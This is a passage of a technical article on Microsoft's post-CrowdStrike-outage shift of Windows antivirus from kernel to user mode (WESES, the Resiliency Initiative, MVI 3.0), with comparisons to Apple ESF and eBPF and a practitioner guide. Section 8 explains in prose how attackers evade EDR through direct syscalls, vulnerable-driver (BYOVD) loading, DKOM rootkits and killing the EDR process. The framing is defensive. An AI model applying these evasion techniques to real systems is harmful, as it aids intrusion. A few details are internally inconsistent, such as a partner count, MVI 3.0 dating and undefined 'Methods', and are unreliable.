What the platform vendor -- Microsoft -- did about that composition is the subject of section 6.

6. The Microsoft Response: WESES, WRI, MVI 3.0

Twenty days after a Congressional witness from CrowdStrike apologized on the record [@cyberscoop-meyers, @govinfo-chrg-118hhrg60030, @meyers-testimony, @homeland-hearing-page], Microsoft did what twenty years of lobbying could not produce: it convened the named Microsoft Virus Initiative partners in Redmond and announced that "additional security capabilities outside of kernel mode" was now a stated platform direction [@weston-2024-09-12]. From that meeting forward, the trajectory of third-party endpoint security on Windows pointed in only one direction.

September 10, 2024: the WESES summit

On September 10, 2024, Microsoft hosted the WESES summit -- the Windows Endpoint Security partner gathering, often abbreviated WESES in trade press -- at its Redmond campus. The attendees included CrowdStrike, Sophos, ESET, SentinelOne, Trend Micro, and Bitdefender, plus U.S. and European government officials [@weston-2024-09-12]. David Weston, Microsoft's vice president for enterprise and operating system security, recapped the summit in a Windows Experience Blog post on September 12, 2024 -- two days later -- and made two specific commitments on Microsoft's behalf. First, Microsoft committed publicly to Safe Deployment Practices as a shared cross-vendor norm. Second, Microsoft committed to "additional security capabilities outside of kernel mode" as a platform direction [@weston-2024-09-12]. No new branded platform yet, no GA date, no API surface. But the political commitment was, for the first time on the public record, an architectural one.

A Microsoft program documenting the requirements third-party antivirus and endpoint security vendors must meet to ship products that integrate with Windows -- including Security Center registration, ELAM (Early-Launch Anti-Malware) participation, and Defender exclusion negotiation [@mslearn-mvi]. MVI is the contractual surface Microsoft uses to require Windows AV vendors to engineer in particular ways; updates to MVI requirements have been the principal lever for the post-Channel-File-291 reforms.

November 19, 2024: Microsoft Ignite, and the Windows Resiliency Initiative

Two months later, at Microsoft Ignite on November 19, 2024, Weston announced the program by name: the Windows Resiliency Initiative, four pillars (reliability including Quick Machine Recovery, fewer administrator-privileged apps, stronger app and driver allow-lists, and identity hardening), and a verbatim commitment that "a private preview will be made available for our security product [partner cohort] in July 2025" [@ms-ignite-2024-11-19]. The "private preview" referred to a new set of user-mode EDR APIs that Microsoft would deliver to a small named cohort of MVI partners. The Ignite post is also the first source to introduce Quick Machine Recovery publicly -- the post-outage recovery primitive engineered specifically to address the on-disk-persistence pathology that Channel File 291 had exposed [@ms-ignite-2024-11-19].

Microsoft's descriptive phrase, used consistently in Weston's June 26, 2025 blog and the November 18, 2025 Windows Experience Blog post, for the new user-mode API surface that lets third-party EDR products subscribe to kernel-curated security telemetry without loading their own kernel driver [@weston-2025-06-26, @ms-nov-2025]. Microsoft has not, as of mid-2026, branded this as a single trademarked proper noun; trade-press shorthand like "WESP" should be treated as commentary, not as a Microsoft product name.

Note: You will see "WESP" -- Windows Endpoint Security Platform, capitalized -- in trade-press coverage and conference talks. As of mid-2026 it is not a Microsoft brand. Microsoft's own primary-source language is the descriptive phrase "the Windows endpoint security platform" (lowercase, no acronym) [@weston-2025-06-26, @ms-nov-2025]. This article uses the Microsoft phrasing throughout.

June 26, 2025: the WRI detailed rollout and MVI 3.0

The most consequential single document in the entire WRI story is Weston's June 26, 2025 Windows Experience Blog post [@weston-2025-06-26]. The post commits, verbatim, that "Next month, we will deliver a private preview of the Windows endpoint security platform to a set of MVI partners... security products like anti-virus and endpoint protection solutions can run in user mode just as apps do" [@weston-2025-06-26]. That second clause is the architectural commitment in one sentence: third-party EDR on Windows runs in user mode, like every other application on Windows.

The same June 26 post names the MVI partner cohort by company -- Bitdefender, CrowdStrike, ESET, SentinelOne, Sophos, Trellix, Trend Micro, and WithSecure -- and embeds on-record statements from five of them (CrowdStrike, ESET, SentinelOne, Sophos, Trellix, and Trend Micro and WithSecure also published quotes) endorsing the migration [@weston-2025-06-26]. The post lays out the requirements of MVI 3.0: Safe Deployment Practices, deployment rings, monitored rollouts, and incident-response testing [@mslearn-mvi]. The November 18, 2025 Windows Experience Blog later established the MVI 3.0 effective date as April 1, 2025 [@ms-nov-2025].

MVI 3.0 requirement	What it mechanically requires	What it does not mechanically verify
Safe Deployment Practices	Vendor publishes a documented deployment process for sensor and content updates	That the published process is correctly enforced in the vendor's release pipeline
Deployment rings	Vendor segments customers into staged rollout cohorts (e.g., internal, canary, GA)	That ring promotion gates actually halt a rollout when a stop-signal fires
Monitored rollouts	Vendor monitors signal data during each ring transition	That the monitoring catches a Channel-File-291-class latent bug
Incident-response testing	Vendor runs scheduled incident-response drills against its own rollout pipeline	That drill outcomes generalize to a novel failure mode never tested

The cohort of named MVI 3.0 partners is the same cohort Apple's Endpoint Security framework migration targeted in 2019. The overlap is not coincidence -- the same companies sell EDR on both platforms, and the same companies are now multi-OS migrating onto the same architecture (user-mode, platform-curated telemetry). The trade press has yet to fully appreciate that the WRI is not a Microsoft-specific architecture choice; it is the second platform vendor making the same choice.

The Ionescu pivot

The single most consequential individual move in the entire two-year story is dated April 3, 2025: CrowdStrike named Alex Ionescu -- co-author of the Windows Internals book series, long-time Windows kernel researcher, and former CrowdStrike employee returning to the company -- as Chief Technology Innovation Officer with an explicit charter to "lead CrowdStrike's participation in the Microsoft Virus Initiative Program (MVI 3.0), working with Microsoft to advise on the implementation of the next-generation vendor security stack for Windows" [@cs-ionescu-ctio-2025-04-03]. Ionescu then published an on-record endorsement of Microsoft's user-mode EDR architecture in Microsoft's own June 26, 2025 Windows Experience Blog post [@weston-2025-06-26].

Key idea: The foremost public Windows kernel researcher in the industry, now CTIO of the company whose kernel driver brought down 8.5 million Windows hosts, is on the record endorsing Microsoft's eviction of vendor kernel-mode antivirus. That is the political signal July 19, 2024 produced, and it is structurally unlike anything that preceded the outage. In 2006, the vendors fought; in 2025, the foremost vendor kernel expert is helping Microsoft build the replacement.

November 18, 2025: the update and the graphics-driver exemption

The most recent Microsoft primary-source document in this article is the November 18, 2025 Windows Experience Blog post [@ms-nov-2025]. Three points in that post matter for the rest of this article. First, "effective April 1, 2025, Version 3.0 of the Microsoft Virus Initiative added new requirements for all Windows antivirus (AV) partners" -- this sets the formal effective date of MVI 3.0 [@ms-nov-2025]. Second, "in June, we released the first private preview of the Windows endpoint security platform, which shifts AV enforcement from the kernel to user mode" -- the framing is AV enforcement generally, not third-party AV enforcement specifically, which by plain reading commits Defender for Endpoint to the same architectural trajectory as the third-party MVI 3.0 cohort [@ms-nov-2025]. Third, the graphics-driver exemption: "graphics drivers, for example, will continue to run in kernel mode for performance reasons" [@ms-nov-2025]. That single concession draws the scope of the WRI cleanly: it is an AV enforcement migration, not a third-party kernel driver elimination program.

Quick Machine Recovery

One more piece of the response deserves explicit mention: Quick Machine Recovery (QMR), the platform-level recovery primitive Microsoft built specifically in response to the on-disk persistence pathology of Channel File 291. QMR is a remote-remediation flow, managed via the Configuration Service Provider model and surfaced as the RemoteRemediation CSP, that can boot a failing Windows host into a recovery environment and apply targeted fixes without manual safe-mode intervention by an administrator [@mslearn-qmr]. The capability first appeared in Windows Insider builds beginning with Build 26120.4230 on June 2, 2025 [@insider-build-26120-4230]. QMR does not, on its own, prevent another Channel-File-291-class event; it makes the recovery from one orders of magnitude cheaper.

flowchart LR A["2024-07-19 Channel File 291 outage, 8.5M hosts"] --> B["2024-07-27 Microsoft secblog publishes WinDBG dump"] B --> C["2024-09-10 WESES summit at Redmond"] C --> D["2024-09-24 House Homeland Security hearing"] D --> E["2024-11-19 Ignite, WRI announced by name"] E --> F["2025-04-01 MVI 3.0 effective"] F --> G["2025-04-03 Ionescu CTIO at CrowdStrike"] G --> H["2025-06-26 WRI detailed rollout, partner cohort"] H --> I["2025-07 private preview to MVI 3.0 partners"] I --> J["2025-11-18 AV enforcement shifts to user mode"]

The U.S.-government context is worth one paragraph of framing. The Government Accountability Office's GAO-24-107733, the Congressional Research Service's IF12717 brief, the House Homeland Security Subcommittee hearing on September 24, 2024, the CISA running alert, and the contemporaneous CyberScoop coverage all converge on the same posture: the July 19 outage was a supply-chain and Safe-Deployment-Practices event, not a cyberattack [@gao-24-107733, @crs-if12717-everycrsreport, @homeland-hearing-page, @govinfo-chrg-118hhrg60030, @meyers-testimony, @cisa-alert-2024-07-19, @cyberscoop-meyers]. The federal response shaped the political environment in which Microsoft chose to announce the WRI; it did not, by itself, design the architecture. The architecture Microsoft picked had been hiding in plain sight for years on two other operating systems, which is the subject of section 7.

7. Apple ESF, Linux eBPF, and the Comparative Architecture

Microsoft did not invent the architecture it is shipping. Two other major operating systems had already picked a different answer years earlier, in opposite directions, and Microsoft's own platform team had been quietly experimenting with both for years before committing to one in public. The comparative-architecture frame matters because it tells us what is genuinely novel about the WRI (very little) and what is genuinely novel about the political moment (almost everything).

Apple Endpoint Security framework, October 7, 2019

On October 7, 2019, with the release of macOS 10.15 Catalina, Apple deprecated third-party kernel extensions for security tools and replaced them with the Endpoint Security framework, a user-space API for authorization (ES_EVENT_TYPE_AUTH_*) and notification (ES_EVENT_TYPE_NOTIFY_*) events fired by the macOS kernel and consumed by Apple-signed user-mode system extensions written by third-party vendors [@apple-esf-docs].

Apple's user-space-only API for security tools, introduced with macOS Catalina (10.15) in October 2019 [@apple-esf-docs]. ESF clients run as system extensions in user mode, subscribe to authorization and notification events emitted by the macOS kernel (process creation, file open, network connect, etc.), and may return `ES_AUTH_RESULT_DENY` to block authorization events synchronously. There is no third-party kernel code path; the kernel signals the user-space client, and the user-space client decides.

What makes ESF the cleanest reference point for the WRI is that ESF is the architecture Microsoft is now shipping under a different label. Both are platform-curated user-mode subscription APIs. Both eliminate third-party kernel drivers from the AV path. Both retain a synchronous authorization gate that lets the vendor's user-mode code answer "allow or deny" before the operating system completes the operation.

The September 2024 Sequoia bug -- the natural experiment we met in section 4 -- is the cleanest available test of whether the ESF architecture contains the blast radius of a 1st-party platform regression. CrowdStrike Falcon for macOS, ESET Endpoint Security, Microsoft Defender for Mac, and SentinelOne all lost network filtering when macOS 15 deprecated the Application Firewall property-list interface [@bleepingcomputer-sequoia, @securityweek-sequoia]. None of them brought down macOS. The hosts kept running. Apple shipped 15.0.1 three weeks later [@techcrunch-sequoia]. The Sequoia outage tested the architecture and the architecture held: feature regression, yes; kernel panic at fleet scale, no.

Linux eBPF, and eBPF for Windows

The Linux answer to the same question is in a different direction entirely. Linux does not move EDR out of kernel mode; it keeps EDR in kernel mode and proves the in-kernel code safe before executing it. The technology is extended Berkeley Packet Filter (eBPF), a kernel-resident bytecode virtual machine that runs vendor-supplied probes attached to kernel hook points, with a static verifier that rejects any program whose memory accesses, control flow, or loop bounds cannot be proven safe at load time [@lwn-bounded-loops].

A Linux kernel subsystem that runs vendor-supplied bytecode programs in kernel context, gated by a static verifier that rejects programs whose memory accesses or control flow cannot be proven safe at load time. eBPF programs attach to hook points (syscall enter/exit, file system events, network packets, tracepoints) and emit data to user space via ring buffers and maps. The Linux EDR industry (Cilium, Tetragon, Falco) is built on eBPF [@lwn-bounded-loops].

The eBPF verifier is non-trivial. Jonathan Corbet's June 2019 LWN article "BPF and bounded loops" describes the Linux 5.3 extension that lifted the original verifier's strict no-loops restriction, permitting bounded loops with statically-determinable trip counts -- enough to write nontrivial in-kernel programs without sacrificing the verifier's termination guarantee [@lwn-bounded-loops]. Every major Linux EDR product in 2026 ships an eBPF probe set as its primary collection substrate.

Microsoft has eBPF for Windows. Microsoft has had eBPF for Windows publicly on GitHub since May 2021, ported the PREVAIL verifier as its formal foundation, and continues to develop the project at the same repository [@msft-ebpf-windows, @ebpf-windows-commits].PREVAIL is the academic verifier whose formal soundness arguments are the foundation of eBPF for Windows. Its design takes the same general approach as the Linux verifier -- abstract interpretation over the bytecode's control flow graph -- and shipped as the open-source verifier Microsoft adopted for the Windows port. Microsoft has shipped eBPF for Windows for networking-centric use cases (XDP-style packet filtering); EDR has not been the primary published use case [@msft-ebpf-windows]. What Microsoft has not done is make eBPF for Windows the substrate of the WRI's third-party EDR architecture. The WRI commits to the Apple-style "exit the kernel" answer, not the Linux-style "stay in the kernel but verifier-bounded" answer.

The three architectural answers

There are exactly three serious architectural answers to the question of where the third-party security observer runs.

Exit the kernel: subscribe from user mode against a platform-curated broker. Apple ESF since 2019; Windows endpoint security platform since the July 2025 private preview.
Stay in the kernel, but only as a verifier-bounded extension. Linux eBPF; eBPF for Windows since 2021.
Operate from below the kernel, in the hypervisor. The Garfinkel and Rosenblum NDSS 2003 origin paper on virtual machine introspection [@wiki-vmi], the Xen Project's VMI APIs [@xen-vmi], Bitdefender's Hypervisor Introspection product shipped commercially in 2016 [@xen-vmi], and Microsoft's own in-platform Virtualization-Based Security (VBS), Hypervisor-protected Code Integrity (HVCI), and Secure Kernel features [@mslearn-hvci].

flowchart TD Q["Where does the third-party security observer run?"] Q --> A1["1. User mode, subscribing via platform broker"] Q --> A2["2. Kernel mode, verifier-bounded extension"] Q --> A3["3. Hypervisor, below the guest kernel"] A1 --> A1a["Apple ESF, since 2019"] A1 --> A1b["Windows endpoint security platform, since 2025"] A2 --> A2a["Linux eBPF"] A2 --> A2b["eBPF for Windows, since 2021"] A3 --> A3a["Bitdefender Hypervisor Introspection, 2016"] A3 --> A3b["Microsoft VBS, HVCI, Secure Kernel"]

Why Microsoft picked (1) over (2)

This is one of the article's most interesting decisions, and the public reasoning is mostly implicit. The eBPF answer (2) would have required every EDR vendor to rewrite on a substrate they had no muscle memory for. The Linux EDR industry took roughly five years to converge on eBPF as its dominant collection mechanism, and Windows EDR vendors have invested in a different abstraction (kernel callbacks plus minifilters) for twenty-five years. A migration to eBPF for Windows would have meant a multi-year vendor-side rewrite to a verifier whose published EDR-attach-point coverage in mid-2026 was incomplete [@msft-ebpf-windows].

The Apple-style answer (1), by contrast, lets vendors keep most of their detection logic where it already runs -- in user-mode sensor processes -- and only replaces the Ring-0 collection substrate with a platform broker. The migration is incremental rather than ground-up. And answer (1) carries a second structural advantage: even a perfect eBPF verifier still leaves vendor bytecode running inside the kernel, where a content-validator failure can still produce a runtime fault under a verifier that proved safety at load time. Answer (1) makes the question unaskable by construction: there is no third-party kernel code path, so a third-party content-validator failure cannot crash the kernel.

Microsoft made a comparative-architecture bet. The bet has a known cost: things a kernel-mode observer can see that a user-mode observer cannot. What exactly does the user-mode EDR lose? That is section 8.

8. What User-Mode EDR Cannot See

Every architectural choice closes some doors. The user-mode EDR architecture closes the door on Channel-File-291-class reliability incidents -- by construction, a vendor-authored data file consumed by a vendor-authored user-mode process can crash the vendor process, not the host. The same architecture, on its own, opens three coverage doors a kernel-callback EDR closed. This section enumerates them honestly.

Gap 1: direct syscall observation

A malicious user-mode process can issue x86-64 syscall instructions directly, bypassing ntdll.dll's exported stubs and therefore bypassing any user-mode hook layer that depends on patching those stubs [@mdsec-direct-syscall]. MDSec's December 2020 write-up "Bypassing user-mode hooks and direct invocation of system calls for red teams" documented the technique in operational detail: an attacker recovers the syscall numbers from a clean copy of ntdll, emits the syscall instruction inline in their own payload, and the operating system services the syscall without ever touching the hook layer the EDR vendor injected into ntdll [@mdsec-direct-syscall]. A user-mode EDR sees only what the platform broker tells it. For the broker to maintain coverage of direct-syscall payloads, the broker itself must be wired into the syscall dispatch path -- the place inside nt!KiSystemServiceCopyArgs where the kernel dispatches user-mode syscalls -- and emit telemetry for every syscall, not only those that arrive via the ntdll stubs.

Microsoft has stated this architecture is in scope but has not published the wire-format detail of the syscall broker as of mid-2026. The honest reading: Microsoft owns this gap, it knows it owns this gap, the EDR partners know Microsoft owns this gap, but the specific shape of the broker's syscall-path integration has not been publicly documented. Treat any third-party claim about the broker's syscall-path wire format as speculation.

Gap 2: rootkit visibility, and the hypervisor answer

A kernel-mode rootkit -- loaded via a Bring-Your-Own-Vulnerable-Driver attack against a signed-but-vulnerable third-party driver -- can hide processes, files, registry keys, and network state from any user-mode observer. The platform broker will emit whatever the kernel sees about the system state; if the rootkit lies to the kernel via DKOM, the broker will faithfully emit the lie.

An attack technique in which a malicious user-mode payload loads a signed, legitimately-issued kernel driver that has a known unfixed vulnerability, then exploits the driver's vulnerability to gain Ring-0 code execution. Because the driver is legitimately signed, neither Windows driver-signing enforcement nor most heuristic load-time defenses block the initial driver load; the attacker gets kernel privilege via a third-party driver they did not have to author or sign themselves.

Microsoft's stated answer for the rootkit-visibility gap is to layer a generation of hypervisor-assisted memory introspection below the user-mode EDR. Bitdefender shipped the first commercial Hypervisor Introspection product in 2016 on top of Xen [@xen-vmi]. Academic work has continued: The Reversing Machine (Karvandi et al., May 2024, arXiv:2405.00298) describes a contemporary research-grade implementation using Intel Mode-Based Execution Control to intercept user-kernel mode transitions and a suspended-process-creation technique to attach hypervisor-based introspection to running guests transparently [@trm-arxiv-2405-00298].

Microsoft's family of in-platform virtualization-based security primitives. *Virtualization-Based Security (VBS)* runs a Hyper-V-derived hypervisor below the Windows kernel, creating two virtual trust levels (VTL0 for the normal kernel, VTL1 for the Secure Kernel). *Hypervisor-protected Code Integrity (HVCI)* enforces that kernel-mode pages are either writable or executable but never both, and that only signed code can be loaded into kernel mode; the enforcement runs in the Secure Kernel and cannot be subverted from VTL0 [@mslearn-hvci].

The Microsoft-side equivalent of the Bitdefender HVI architecture is the family of platform features documented under VBS, HVCI, and the Secure Kernel [@mslearn-hvci]. The Secure Kernel is, architecturally, exactly the vantage from which a hypervisor can read guest memory authoritatively and answer questions about kernel state that the guest kernel itself cannot be trusted to answer correctly. Whether the Windows endpoint security platform's broker will surface that authoritative read to third-party EDR partners -- and through what API -- is part of the not-yet-public detail of the platform.

Gap 3: tamper resistance of the EDR process itself

A user-mode EDR is a user-mode process. Malware that obtains SeDebugPrivilege -- usually by abusing a misconfigured service account or a credential-stealing exploit -- can in principle suspend or terminate the EDR process. The Windows mitigation for this class of attack is Protected Process Light (PPL), the same mechanism Microsoft uses to harden MsMpEng.exe (the Microsoft Defender Antimalware Service) against tampering by anything short of a kernel-mode attacker. Whether the Windows endpoint security platform's user-mode EDR processes will get PPL by default in the private preview, and whether they will get a stronger Protected Process classification, is not documented in any primary source as of mid-2026.

The BYOVD coverage question, with a dated negative finding

The CISA Eviction Strategies Tool countermeasure CM0058 names the four enforcement substrates that activate Microsoft's Vulnerable Driver Block List: "Microsoft's vulnerable driver blocklist is a native utility for Windows 11 2022 and above that receives updates 1-2 times per year... enforced when Hypervisor-protected coded integrity or HVCI, Smart App Control, or S mode is active" [@cisa-cm0058, @mslearn-driver-block-rules]. The block list itself is a Microsoft-maintained allow-list of non-allowed kernel drivers -- specifically, the signed-but-vulnerable drivers known to be abused for BYOVD attacks.

Note: Neither CISA's CM0058 page nor any Microsoft public document publishes aggregate telemetry on what fraction of Windows enterprise endpoints have any of the four enforcement substrates (HVCI, Smart App Control, S Mode, or App Control for Business) active in mid-2026 [@cisa-cm0058]. Microsoft Defender for Endpoint surfaces per-tenant Memory Integrity enablement recommendations; Microsoft has not aggregated those recommendations into a fleet-level statistic. The BYOVD enforcement coverage gap is known qualitatively (the block list exists; enforcement is opt-in via four substrates; updates are infrequent) but cannot be quantified from public evidence.

The kernel attack surface that nothing in user mode can observe

Below all of this -- below user-mode EDR, below kernel-mode EDR, below the Secure Kernel -- lies the genuine bottom of the stack: bootkits, System Management Mode resident malware, firmware implants, and pre-boot attacks that compromise the host before any antivirus product has loaded. No user-mode EDR can meaningfully observe any of this. No kernel-mode EDR can fully observe any of this either. The platform answers are Secured-core PC, Microsoft Pluton, and Measured Boot -- platform-curated, Microsoft-owned, hardware-rooted defenses that the third-party industry does not write code inside of. The WRI does not close the firmware gap; it delegates the firmware gap to Microsoft platform features. That delegation is exactly what Microsoft has always wanted (the platform owns the security boundary) and exactly what vendors have always resisted (the platform owns the security boundary). July 19, 2024 is the day vendors stopped publicly resisting.

The coverage matrix

The coverage tradeoffs in one table. Cells mark the architecture's native ability to observe each visibility primitive: full coverage, partial coverage, or none.

Visibility primitive	Kernel-callback EDR	User-mode EDR + broker	Hypervisor introspection	Microsoft platform features
Direct syscall (no `ntdll` stub)	full (via syscall path hooks)	partial (depends on broker wire format)	full (from VTL1)	full (by construction)
Rootkit visibility (DKOM)	partial (rootkit can subvert peer-driver views)	none (broker reflects kernel-reported state)	full (authoritative memory read)	full (via Secure Kernel)
Tamper resistance of the EDR process	partial (kernel access lets attacker disable peer driver)	partial (PPL needed)	full (out of band)	full (Defender uses PPL today)
BYOVD detection	partial (post-load only)	none (vendor cannot reload kernel)	partial (post-load, via VTL1 inspection)	full (Vulnerable Driver Block List + HVCI, where enabled)
Bootkit, SMM, firmware visibility	none	none	partial (pre-OS attestation only)	full (Secured-core PC, Pluton, Measured Boot)

Key idea: The user-mode EDR architecture closes the reliability problem (a Channel-File-291-class bug crashes a user-mode process, not the kernel). It does not, on its own, close the coverage problem. The coverage problem is being delegated from vendor EDR to Microsoft platform features -- to the Vulnerable Driver Block List, to HVCI, to the Secure Kernel, to Pluton, to Defender's baseline detection coverage. Whether that delegation reaches Method-A coverage equivalence is the open architectural question of mid-2026, and the honest answer is "we do not yet know."

What else is genuinely open? That is section 9.

9. What Is Still Open in mid-2026

What does the honest answer look like, twenty-three months after the outage and twelve months after the WRI's detailed rollout? Several dated negative findings and one positive finding, and the right epistemic posture for reading them is the same posture security engineers should bring to any architectural transition in flight: the absence of an announcement is its own evidence.

Has Microsoft committed to a date by which third-party AV kernel drivers will be forbidden?

No primary source uses the words "ban" or "deadline" or any equivalent hard-stop phrasing. The November 18, 2025 Microsoft Windows Experience Blog frames the program as an enforcement migration -- "shifts AV enforcement from the kernel to user mode" -- and the June 26, 2025 Weston post commits to the private preview as a step in a partner-coordinated journey, not as the first of two phases ending in a third-party kernel-driver lockout [@ms-nov-2025, @weston-2025-06-26]. The article describes the transition as multi-year, partner-coordinated, and without a published hard deadline as of mid-2026. Anyone telling you Microsoft has committed to a date is reading something into the public record that the public record does not contain.

Will the WRI user-mode EDR APIs reach feature equivalence with today's kernel-callback EDR?

The on-record partner statements quoted in the June 26, 2025 blog use hedging language: "continue to provide feedback," "no degradation in security or performance," and similar [@weston-2025-06-26]. That phrasing is not a claim of equivalence achieved; it is a claim of commitment to work toward equivalence. The strongest evidence equivalence is reachable is Apple's seven-year ESF deployment: by 2026, every major Windows-side EDR vendor also ships a macOS-side ESF-based product, and the macOS-side product is broadly considered competitive in detection coverage with peer kernel-based products on other platforms. The Windows answer for mid-2026 is empirically unknown -- the API surface is in active evolution, and the partner cohort is still inside the private preview.

Has any MVI 3.0 deployment ring actually halted a vendor content update since June 26, 2025?

This is the most important operational question and the one with the most honest negative answer. No public primary source documents either a ring stop-gate event (an MVI 3.0 partner caught a latent Channel-File-291-class bug at a canary ring and halted the rollout before fleet propagation) or a ring-escape incident (a latent bug got through the rings and produced a fleet event) from any of the eight named MVI 3.0 partners through the most recent search horizon. The SentinelOne May 29, 2025 cloud control-plane outage [@sentinelone-may-29-rca] is structurally orthogonal to the failure mode the rings are designed to catch -- per SentinelOne's own RCA, "a software flaw in an outgoing infrastructure control system triggered an automatic function that removed critical network routes" and "customer endpoints remained protected" throughout -- so it does not stress-test the rings. The honest framing has two competing readings: the rings are working silently, or the rings have not yet been stress-tested by a Channel-File-291-class latent bug in any partner's content pipeline. Neither reading can be discriminated from current public evidence.The SentinelOne May 29, 2025 event is the closest post-WRI partner-side reliability incident on the public record, and it is worth a paragraph of distinction. The failure was a cloud control-plane network-routes deletion that knocked SentinelOne's customer-facing management console offline; per the company's own RCA, customer endpoints remained protected throughout, federal environments were not impacted, and no endpoint content update was involved [@sentinelone-may-29-rca]. The event is exactly the kind of reliability incident the MVI 3.0 rings are not designed to catch -- the rings address Safe Deployment Practices for sensor and content updates, not cloud control-plane reliability.

Will Microsoft hold itself to the same kernel-out standard as MVI partners?

The November 18, 2025 Microsoft Windows Experience Blog uses the framing "AV enforcement" (not "third-party AV enforcement") -- by plain reading this commits Microsoft Defender for Endpoint to the same trajectory as the third-party MVI 3.0 cohort [@ms-nov-2025]. The article notes this as the closest available public Defender-kernel-out signal, while being honest that no Defender-specific GA date for the user-mode migration has been published. The same November 18 post explicitly carves out the graphics-driver exemption [@ms-nov-2025] -- which by plain reading means that non-AV third-party kernel drivers will continue to ship under the existing model. The WRI is, narrowly, an AV-enforcement migration.

In June, we released the first private preview of the Windows endpoint security platform, which shifts AV enforcement from the kernel to user mode... Graphics drivers, for example, will continue to run in kernel mode for performance reasons. -- Microsoft Windows Experience Blog, November 18, 2025 [@ms-nov-2025]

Note: The MVI 3.0 ring question -- has any partner actually halted a rollout at a ring boundary since June 26, 2025? -- admits two readings from current evidence. Reading one: the rings are working silently, catching latent bugs that never become public, because the entire point of a working ring is that nothing happens. Reading two: the rings have not yet been stress-tested by a Channel-File-291-class latent bug at any partner. Both readings are consistent with the dated negative finding "no public stop-gate event has been documented." Anyone telling you they know which reading is right is overclaiming. The right epistemic posture is to keep watching, and to read partner-side RCAs as they appear.

What fraction of enterprise Windows endpoints enforces the Vulnerable Driver Block List?

The CISA CM0058 page is the canonical document and it publishes no enablement telemetry [@cisa-cm0058]. Microsoft's own documentation for the block list publishes update cadence (one to two times per year) and a per-substrate description of where the block list activates (HVCI, Smart App Control, S Mode, or App Control for Business) but no aggregate fleet-level enablement statistic [@mslearn-driver-block-rules, @cisa-cm0058]. Microsoft Defender for Endpoint surfaces per-tenant Memory Integrity enablement recommendations but does not aggregate. The BYOVD enforcement gap is known qualitatively and cannot be quantified from public evidence as of mid-2026. Anyone publishing a percentage figure for HVCI enablement across the global Windows enterprise fleet is publishing a guess.

These are five open questions with five honest answers. The reader leaves section 9 knowing not the answers, but the shape of the questions -- which is the right epistemic state in which to read the practical guide that follows. What should you do, mid-2026, with this knowledge? That is section 10.

10. Practical Guide for mid-2026

Three audiences, three different sets of next moves. The article has been writing for these three audiences since the first paragraph -- the Windows enterprise administrator, the security-product architect, and the incident responder -- and each gets a short, concrete checklist that respects the open architectural questions of section 9.

For the Windows enterprise administrator

Treat your antivirus and EDR vendor's update cadence as part of your fleet's blast radius. The cadence of vendor content updates is, in mid-2026, the operational variable most likely to produce your next mass-availability incident. Ask your vendor for their MVI 3.0 documentation and verify they are running staged deployment rings rather than gating only at a single global GA promote [@mslearn-mvi, @weston-2025-06-26].
Enable Quick Machine Recovery on Windows 11 24H2 and later [@mslearn-qmr]. QMR is the platform-level recovery primitive Microsoft built specifically for Channel-File-291-style on-disk persistence pathology, and it materially reduces recovery time for any future event that produces unbootable hosts at scale [@insider-build-26120-4230].
Enable HVCI / Memory Integrity wherever your hardware supports it [@mslearn-hvci]. HVCI is one of the four substrates that activates Microsoft's Vulnerable Driver Block List, and enabling it brings the BYOVD blocklist from a published-but-inert resource to an enforced runtime control on your endpoints [@mslearn-driver-block-rules, @cisa-cm0058].
If your fleet still depends on a kernel-only AV stack, push your vendor for their Method-C (user-mode) roadmap commitments. The MVI 3.0 partner cohort named in Weston's June 26, 2025 post is the right reference list: vendors not on it have not made a public commitment of equivalent specificity, and that should affect your procurement calculus [@weston-2025-06-26].
Audit your Defender exclusion list. The principle of least privilege applies to your AV configuration just as much as to your user accounts -- every exclusion is a path past your detection coverage, and Defender exclusions inherited from 2018 deployments are a routine finding in modern enterprise audits.

For the security-product architect

Apply for MVI 3.0 partnership and request access to the Windows endpoint security platform private preview now [@mslearn-mvi]. The API surface is in active evolution and partner feedback is materially shaping the contract. Vendors who wait for GA will inherit a contract written by competitors.
Plan a migration roadmap from kernel callbacks (Method A) to user-mode subscription (Method C). Assume Method A remains the bridge for several more years and that a hybrid Method-A-plus-Method-C deployment will be your production reality through at least the late 2020s. Engineer for Method C as the future-primary substrate while Method A continues to carry production detection coverage.
Engineer your content delivery pipeline as if the platform will eventually require ring-based staged deployment under contractual gating. The MVI 3.0 deployment-ring requirements are the model: internal ring, canary ring, GA ring, with monitored promotion gates between each [@weston-2025-06-26]. Build the pipeline now even if the contractual requirement does not yet bind you, because the alternative is rebuilding it under emergency pressure later.
For BYOVD coverage and rootkit visibility you cannot get from user mode, design around platform features rather than rebuilding them yourself. The Vulnerable Driver Block List, HVCI, Secured-core PC, Pluton, and Defender's baseline are platform-curated controls; layer your detection coverage on top of them rather than parallel to them [@mslearn-driver-block-rules, @mslearn-hvci, @cisa-cm0058].
Treat the Apple ESF deployment as your reference implementation. Your macOS-side ESF migration -- which most major Windows EDR vendors completed between 2019 and 2024 -- is the closest analogue to the Windows-side migration you are now starting. The architectural lessons transfer; do not repeat the early-ESF mistakes on the Windows side.

For the incident responder

The on-disk artifacts from the July 19 outage -- C-00000291*.sys channel files, the minidumps with csagent.sys+0x... frames -- are the canonical reference set for "vendor-content-update-bug-checks-kernel-driver" investigations [@ms-secblog-2024-07-27]. Treat any future "vendor module + nt!KiPageFault + unmapped address" stack as structurally analogous and apply the same runbook posture.
The next analogous incident will look the same in the dumps. The faulting module name will be different; the offset will be different; the unmapped address will be different. The pattern -- vendor kernel module, page fault from nt!KiPageFault, unmapped read address in the high half of the canonical address space, PAGE_FAULT_IN_NONPAGED_AREA -- will be identical.
Build playbooks now for "vendor content update reverted but on-disk-persisted" scenarios. QMR is the platform answer [@mslearn-qmr], but your runbook is what gets your fleet through the first hour before a Microsoft-provided recovery flow is appropriate. The first-hour runbook for July 19, 2024 was "safe-mode boot, delete the file, reboot," and it is worth having that runbook in your incident playbook today for the next analogous event.
Document your AV/EDR vendor's incident-response point of contact and their SLA. The July 19 morning was characterized by vendor-side communication latency in the first hour, not by lack of platform recovery options. Pre-staging the vendor's IR contact and your fleet-wide content-revert process will compress your time-to-mitigation by orders of magnitude.

A cross-platform reality check

A practitioner moving from macOS to Windows in 2026 will find that macOS gave them one architecture (Method C since 2019), Linux gave them one architecture in the opposite direction (eBPF dominant), and Windows is the transitional platform where Methods A, B, C, D, E, and F all coexist in different states of deployment. The architectural choice on Windows in 2026 is not "which method"; it is "which combination, and how to migrate from your current combination to your target combination." That is the bridge-year reality, and it will be the bridge-year reality through at least the late 2020s.

Note: Mid-2026 is the bridge year. Your job is to design for the bridge, not for either bank.

11. Common Misconceptions

